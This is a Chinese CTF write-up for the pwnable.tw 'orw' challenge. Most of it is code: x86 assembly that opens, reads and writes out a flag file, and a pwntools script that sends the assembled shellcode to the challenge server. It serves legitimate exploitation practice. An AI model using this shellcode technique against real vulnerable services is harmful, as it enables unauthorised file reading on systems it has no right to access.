pwnable.tw orw

md大半夜失眠

由程序可知,读入的 shellcode 将被执行,但只能使用open,read,write三个系统调用去打开/home/orw/flag
QQ截图20170729052549.jpg-57.4kB
生成 shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
context(log_level='debug')
code = """
.global _start
_start:
jmp file
sys_shell:
mov ecx,0x0
mov eax,0x5
pop ebx
int 0x80
mov ebx,eax
mov eax,0x3
mov ecx,0x0804A040
mov edx,0x50
int 0x80
xor ebx,ebx
mov eax,0x04
int 0x80
file:
call sys_shell
.string "/home/orw/flag"
"""
context(arch='x86', os='linux', endian='little', word_size=32)
shellcode = asm(code).encode('hex')
shell = ""
while len(shellcode):
shell += r'\x'+shellcode[:2]
shellcode = shellcode[2:]
print shell

1
2
3
4
5
6
7
8
#!/usr/bin/env python
from pwn import *
io = remote('chall.pwnable.tw',10001)
shellcode="\xeb\x29\xb9\x00\x00\x00\x00\xb8\x05\x00\x00\x00\x5b\xcd\x80\x89\xc3\xb8\x03\x00\x00\x00\xb9\x40\xa0\x04\x08\xba\x50\x00\x00\x00\xcd\x80\x31\xdb\xb8\x04\x00\x00\x00\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x68\x6f\x6d\x65\x2f\x6f\x72\x77\x2f\x66\x6c\x61\x67\x00"
io.recvuntil(":")
io.send(shellcode)
io.interactive()

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
,